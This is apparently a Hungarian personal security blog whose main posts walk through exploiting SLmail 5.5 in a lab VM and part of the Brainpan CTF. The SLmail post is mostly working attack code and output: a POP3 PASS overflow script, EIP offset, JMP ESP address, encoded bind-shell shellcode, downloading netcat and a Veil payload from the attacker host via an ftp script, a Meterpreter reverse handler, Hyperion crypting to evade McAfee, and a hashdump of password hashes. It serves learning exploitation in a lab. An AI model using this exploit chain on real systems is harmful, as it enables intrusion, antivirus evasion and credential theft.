2014. március 16., vasárnap

irisscon 2012 CTF challenges

A hétvégén ezzel szórakoztam:

http://damienoreilly.org/ctf/index.php

Ennyire futotta egyelőre:











A WeChall-on feljöttem a 11. helyre :)






Elkezdtem reverse engineeringgel foglalatoskodni és már a szimpla feladványokat meg tudom oldani ezzel a kevéske tudással :)


A HackThisSite.org-on vannak nagyon jó kis feladványok:






Meg a ThisIsLegal.com-on is lejutottam egy darabig:


Egyelőre ennyi.

2014. január 23., csütörtök

SLmail exploit


1st step: download the SLmail 5.5 package from http://www.offensive-security.com/pwbonline/extrabos.tar.gz
2nd step: install SLmail on an isolated Windows XP lab VM (the target below is 192.168.56.105 on a host-only network; the POP3 service is remotely exploitable, so never expose it outside the lab).

netstat -naob

 Protokoll  Helyi cím              Idegen cím             Állapot           PID
  TCP    0.0.0.0:25             0.0.0.0:0              FIGYEL          1944
  [slsmtp.exe]

  TCP    0.0.0.0:79             0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:106            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:110            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

...

  TCP    0.0.0.0:180            0.0.0.0:0              FIGYEL          1840
  [SLadmin.exe]
...
  TCP    127.0.0.1:8376         0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]
...
  UDP    0.0.0.0:50             *:*                                    2376
  [SLmail.exe]

  UDP    0.0.0.0:54             *:*                                    2376
  [SLmail.exe]
...

root@kali:~# unicornscan -mT 192.168.56.105
TCP open                smtp[   25]        from 192.168.56.105  ttl 128
TCP open              finger[   79]        from 192.168.56.105  ttl 128
TCP open          3com-tsmux[  106]        from 192.168.56.105  ttl 128
TCP open                pop3[  110]        from 192.168.56.105  ttl 128
TCP open               epmap[  135]        from 192.168.56.105  ttl 128
TCP open         netbios-ssn[  139]        from 192.168.56.105  ttl 128
TCP open        microsoft-ds[  445]        from 192.168.56.105  ttl 128
TCP open             unknown[ 8081]        from 192.168.56.105  ttl 128

root@kali:~# nmap -sV -A 192.168.56.105 -pT:25,79,106,110,180

25/tcp  open  smtp    SLmail smtpd 5.5.0.4433
| smtp-commands: xxxxx-30298B2AD.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN,
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp  open  finger  SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp open  pop3pw  SLMail pop3pw
110/tcp open  pop3    BVRP Software SLMAIL pop3d
180/tcp open  ris?

root@kali:~# nc 192.168.56.105 25
220 xxxxx-30298B2AD.com SMTP Server SLmail 5.5.0.4433 Ready ESMTP spoken here
HELO my
250 xxxxx-30298B2AD.com
HELP
214-This server supports the following commands.
214-HELO    MAIL    RCPT    DATA    RSET
214-SEND    SOML    SAML    HELP    NOOP
214 QUIT
QUIT
221 xxxxx-30298B2AD.com Service closing transmission channel

root@kali:~# nc 192.168.56.105 79
?
Unable to find specified user.

root@kali:~# nc 192.168.56.105 106
200 hello
help
500 protocol error
?
500 protocol error
quit
200 bye

root@kali:~# nc 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00005.988109@xxxxx-30298B2AD.com>
HELP
-ERR unknown command
?
-ERR unknown command
QUIT
+OK POP3 server xxxxx-30298B2AD.com signing off.

root@kali:~# nc 192.168.56.105 180
?
HELP
QUIT
^C

http://www.exploit-db.com/exploits/638/

root@kali:~# searchsploit slmail
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
SLMail 5.5 POP3 PASS Buffer Overflow Exploit                                /windows/remote/638.py
SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit                       /windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit                                 /windows/remote/646.c

root@kali:~# cat slmail_buf.py
import sys
import struct
import socket
from time import sleep

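# SLmail 5.5 POP3 crash PoC: connect, read the banner, send USER, then send a
# PASS argument long enough to overrun the stack buffer. The original sent
# the same three messages but had no argument check, no timeout (the last
# recv() hangs forever once the service has crashed) and no socket cleanup.
# Later variants of this script only change `buffer` (cyclic pattern, then
# filler + JMP ESP + NOP sled + shellcode).
if len(sys.argv) != 3:
    sys.stderr.write('usage: %s <host> <port>\n' % sys.argv[0])
    sys.exit(1)

buffer = b'A' * 2000  # overflow payload; bytes so this runs on Python 2 and 3

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)  # a crashed service never answers the final recv()
try:
    s.connect((sys.argv[1], int(sys.argv[2])))
    print(s.recv(1024))                         # +OK POP3 server ... ready
    s.send(b'USER user\r\n')
    print(s.recv(1024))                         # +OK user welcome here
    s.send(b'PASS ' + buffer + b'\r\n')
    print(s.recv(1024))                         # -ERR ... or nothing if it crashed
except socket.timeout:
    sys.stderr.write('no reply - the service has probably crashed\n')
finally:
    s.close()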

Attach OllyDbg to SLmail.exe on the target (the POP3 listener, PID 2376 in the netstat output above) before running the script, so the crash state can be inspected:
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00006.1554953@xxxxx-30298B2AD.com>

+OK user welcome here

-ERR unable to lock mailbox

buffer = 'A'*5000

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00007.1647656@xxxxx-30298B2AD.com>

+OK user welcome here

^CTraceback (most recent call last):
  File "slmail_buf.py", line 16, in <module>
    data=s.recv(1024)
KeyboardInterrupt

ESP 01BFA154 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
EIP 41414141

root@kali:~# /usr/share/metasploit-framework/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A...

buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...

root@kali:~# python slmail_buf.py 192.168.56.105 110

ESP 01BFA154 ASCII "2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh
EBP 46307A46
EIP 7A46317A

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 7A46317A
[*] Exact match at offset 4654

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 2Fz3
[*] Exact match at offset 4658

OllyDbg: search the loaded modules for a JMP ESP (FF E4) instruction. The address found below appears to be a system-DLL address (0x7C91xxxx) and is specific to this XP SP3 build - it will differ on other patch levels or language builds - so for a portable exploit prefer a JMP ESP inside one of SLmail's own DLLs.

7C91FCD8   FFE4             JMP ESP

root@kali:~# msfpayload  windows/shell_bind_tcp RPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t python
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

buf =  ""
buf += "\xdb\xd2\xb8\xb3\xb6\xb4\xe1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x03\x47\x18\x83\xc7\xb7\x54"
buf += "\x41\x1d\x5f\x11\xaa\xde\x9f\x42\x22\x3b\xae\x50\x50"
...
buffer = '\x41' * 4654 + '\xD8\xFC\x91\x7C' + '\x90'*32 + buf

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00001.6738453@xxxxx-30298B2AD.com>

+OK user welcome here

root@kali:~# nc 192.168.56.105 4444
Microsoft Windows XP [verziószám: 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmailSystem>

Next step: bypass the AV and escalate privileges. (Two notes: the bind shell listened on 4444 only because that is shell_bind_tcp's default LPORT - RPORT is not an option of that payload; and, as the AV log below shows, the shell already runs as NT AUTHORITY\SYSTEM because the SLmail service does, so there is nothing left to escalate.)

C:\Program Files\SLmail\System>tftp -i 192.168.56.101 GET nc.exe
tftp -i 192.168.56.101 GET nc.exe
A hozzáférés megtagadva.

AV log:

2014.01.24.    09:46:38    Blocked by Access Protection rule     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\cmd.exe    C:\WINDOWS\system32\tftp.exe    Anti-virus Standard Protection:Prevent use of tftp.exe    Action blocked : Read

C:\Program Files\SLmail\System>echo open 192.168.56.101 21> ftp.txt
echo open 192.168.56.101 21> ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET nc.exe>>ftp.txt
echo GET nc.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhasználó (192.168.56.101:(none)): open 192.168.56.101 21

bin
GET nc.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajtóban (C) lévő kötet xp_system.
 A kötet sorozatszáma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  09:48    <DIR>          .
2014.01.24.  09:48    <DIR>          ..
2014.01.24.  09:47                56 ftp.txt
2002.11.19.  11:40             3 358 listrcrd.txt
2014.01.23.  09:24             1 898 maillog.000
2014.01.24.  00:00            51 104 maillog.001
2014.01.24.  09:33             6 141 maillog.txt
               5 fájl            62 557 bájt
               2 könyvtár  30 726 782 976 bájt szabad

C:\Program Files\SLmail\System>

AV log:

2014.01.24.    9:48:12    Deleted     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\ftp.exe    C:\Program Files\SLmail\System\nc.exe    Tool-NetCat (Potentially Unwanted Program)

Generate a payload16.exe with Veil.

C:\Program Files\SLmail\System>echo open 192.168.56.101 21>ftp.txt
echo open 192.168.56.101 21>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET payload16.exe>>ftp.txt
echo GET payload16.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhasználó (192.168.56.101:(none)): open 192.168.56.101 21


bin
GET payload16.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajtóban (C) lévő kötet xp_system.
 A kötet sorozatszáma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  10:27    <DIR>          .
2014.01.24.  10:27    <DIR>          ..
2014.01.24.  10:27                63 ftp.txt
2002.11.19.  11:40             3 358 listrcrd.txt
2014.01.23.  09:24             1 898 maillog.000
2014.01.24.  00:00            51 104 maillog.001
2014.01.24.  10:03             6 309 maillog.txt
2014.01.24.  10:27         3 059 256 payload16.exe
               6 fájl         3 121 988 bájt
               2 könyvtár  30 723 756 032 bájt szabad

C:\Program Files\SLmail\System>

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.101:443
[*] Starting the payload handler...

C:\Program Files\SLmail\System>payload16.exe
payload16.exe

msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:443 -> 192.168.56.105:3089) at 2014-01-24 10:56:18 +0100

sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ xxxxx-30298B2AD  192.168.56.101:443 -> 192.168.56.105:3089 (192.168.56.105)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : xxxxx-30298B2AD
OS              : Windows XP (Build 2600, Szervizcsomag 3).
Architecture    : x86
System Language : hu_HU
Meterpreter     : x86/win32
meterpreter >

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session     User                                                                                                      Path
 ---   ----  ----                  ----  -------     ----                                                                                                      ----
 0     0     [System Process]            4294967295                                                                                                           
 4     0     System                x86   0           NT AUTHORITY\SYSTEM                                                                                      
 188   2012  explorer.exe          x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\WINDOWS\Explorer.EXE
 300   1600  cmd.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\WINDOWS\system32\cmd.exe
...

 532   848   FrameworkService.exe  x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\Common Framework\FrameworkService.exe
 580   848   VsTskMgr.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
 644   2476  McTray.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\Common Framework\McTray.exe
 712   644   shstat.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\VirusScan Enterprise\SHSTAT.EXE
 744   848   mdm.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
 752   580   mfeann.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\mfeann.exe
...
                                                                           C:\WINDOWS\system32\mfevtps.exe
 976   3676  payload16.exe         x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\payload16.exe
...

 1840  848   SLadmin.exe           x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLadmin\SLadmin.exe
 1944  848   SLSmtp.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\slsmtp.exe
...

 2100  300   nc.exe                x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\nc.exe
 2136  848   mcshield.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe

meterpreter >

I ran nc.exe through the Hyperion crypter as well:

root@kali:~/Hyperion-1.0# wine crypter.exe nc.exe nc_crypt.exe

Opening nc.exe
Copied file to memory: 0x117358
Found valid MZ signature
Found pointer to PE Header: 0xd8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

...

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm nc_crypt.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

The crypted binary is no longer flagged by McAfee. Note that the session is NT AUTHORITY\SYSTEM from the start - the SLmail service itself runs as SYSTEM - so the getsystem call below has nothing to escalate.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Admin:1022:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
ASPNET:1004:275b6f5ffbf7997723474a13bebfa08d:738da873863e137c2e75504e6a8b4ca5:::
Rendszergazda:1005:aad3b435b51404eeaad3b435b51404ee:6f3961367d2b4d1f55f14af59f34cd45:::
Segítségnyújtó:1021:b3c85a07a2fc61530574f646d69db64a:2e82f56f50cfaa7347b018126bcad628:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bf0859717440c82b18e3f5cb36db8211:::
user:1023:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Vendég:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

Game OVER.

2014. január 17., péntek

Brainpan - 2

root@kali:~# netdiscover

192.168.56.104

root@kali:~# unicornscan -mT 192.168.56.104

TCP open                ndmp[10000]

root@kali:~# nmap -sS -A 192.168.56.104 -pT:10000

10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)

root@kali:~# nmap -sT 192.168.56.104 -pT:1-65535

9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

root@kali:~# nmap -sS -A 192.168.56.104 -pT:9999

SF-Port9999-TCP:V=6.40%I=7%D=1/16%Time=52D7DAB2%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");

root@kali:~# nc 192.168.56.104 9999

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

http://192.168.56.104:10000/

root@kali:~# nikto -host 192.168.56.104 -port 10000
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        10000
+ Start Time:         2014-01-16 14:21:40 (GMT1)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ 6544 items checked: 25 error(s) and 4 item(s) reported on remote host
+ End Time:           2014-01-16 14:21:52 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

http://192.168.56.104:10000/bin/

brainpan.exe (downloaded)

root@kali:~# hd brainpan.exe | more

4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|

The MZ signature marks this as a Windows PE executable. It binds the same port 9999 as the target, so the remote service is presumably this very binary; running it locally under Wine lets us crash and debug it offline instead of probing the live host.

root@kali:~# wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

root@kali:~# netstat -nl | grep 9999

tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN

root@kali:~# nc 127.0.0.1 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

root@kali:~# strings brainpan.exe
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|
[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             
                          >>
                          ACCESS DENIED
                          ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter
__getmainargs
__p__environ
__p__fmode
__set_app_type
_assert
_cexit
_iob
_onexit
_setmode
abort
atexit
free
malloc
memset
printf
signal
strcmp
strcpy
strlen
WSACleanup
WSAGetLastError
WSAStartup
accept
bind
closesocket
htons
listen
recv
send
socket
KERNEL32.dll
msvcrt.dll
WS2_32.DLL

root@kali:~# nc 127.0.0.1 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED

root@kali:~# nc 192.168.56.104 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED

The password is shitstorm.

This is probably a buffer-overflow challenge: the strings output shows strcpy() imported and a "[get_reply] copied %d bytes to buffer" message, i.e. the password is copied into a fixed-size buffer with no apparent length check.

I send a BIG string to password...

[get_reply] s =

[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(■B]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x61616161 at address 0x61616161 (thread 0009), starting debugger...
Unhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:61616161 ESP:0042f810 EBP:61616161 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  61616161 61616161 61616161 61616161
0x0042f820:  61616161 61616161 61616161 61616161
0x0042f830:  61616161 61616161 61616161 61616161
0x0042f840:  61616161 61616161 61616161 61616161
0x0042f850:  61616161 61616161 61616161 61616161
0x0042f860:  61616161 61616161 61616161 61616161

0x61 = 'a': the saved EBP and EIP and the stack at ESP are all overwritten with our password bytes, so the overflow gives full control of the return address.

root@kali:~# hexeditor overflow.txt

root@kali:~# nc 127.0.0.1 9999 < overflow.txt

...
bbbbabcdabcdefghijklmnopqrstuvwxyz{|}~

[get_reply] copied 540 bytes to buffer

 EIP:69686766 ESP:0042f810 EBP:65646362 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  6d6c6b6a 71706f6e 0a747372 00000000
0x0042f820:  00000000 00000000 00000000 00000000

EIP : 69686766 (ihgf) EBP: 65646362 (edcb)

Stack: mlkj qpon utsr yxwv
       }|{z

EIP -> ESP, 69686766 (ihgf) -> 0042f810 

